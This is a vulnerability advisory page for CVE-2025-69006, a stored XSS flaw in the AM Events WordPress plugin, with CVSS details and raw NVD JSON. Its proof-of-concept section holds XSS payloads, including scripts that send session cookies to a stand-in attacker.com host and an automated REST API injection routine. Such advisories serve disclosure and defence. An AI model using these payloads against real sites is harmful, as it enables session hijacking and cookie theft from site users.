Security Vulnerability Report
中文
CVE-2025-69006 CVSS 5.9 MEDIUM

CVE-2025-69006

Published: 2025-12-30 11:15:59
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atte Moisio AM Events am-events allows Stored XSS.This issue affects AM Events: from n/a through <= 1.13.1.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

AM Events <= 1.13.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- WordPress AM Events Plugin Stored XSS PoC --> <!-- Login as admin/editor, create or edit an event and inject this payload --> <!-- Basic XSS Payload --> <img src=x onerror=alert(document.cookie)> <!-- Cookie Stealing Payload --> <script> var cookies = document.cookie; fetch('https://attacker.com/steal?c=' + btoa(cookies), { method: 'POST', mode: 'no-cors' }); </script> <!-- Stored XSS in Event Title Field --> Event Title: <img src=x onerror=this.src='https://attacker.com/log?c='+document.cookie> <!-- Automated PoC using WordPress REST API --> const wpLogin = async (username, password) => { const response = await fetch('/wp-login.php', { method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: `log=${username}&pwd=${password}&wp-submit=Login` }); return document.cookie; }; const injectXSS = async (cookie) => { const payload = '<img src=x onerror=fetch(`https://attacker.com/?c=${btoa(document.cookie)}`)>'; await fetch('/wp-json/wp/v2/am_event', { method: 'POST', headers: { 'Content-Type': 'application/json', 'Cookie': cookie }, body: JSON.stringify({ title: payload, status: 'publish' }) }); };

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69006", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:58.810", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Atte Moisio AM Events am-events allows Stored XSS.This issue affects AM Events: from n/a through <= 1.13.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/am-events/vulnerability/wordpress-am-events-plugin-1-13-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}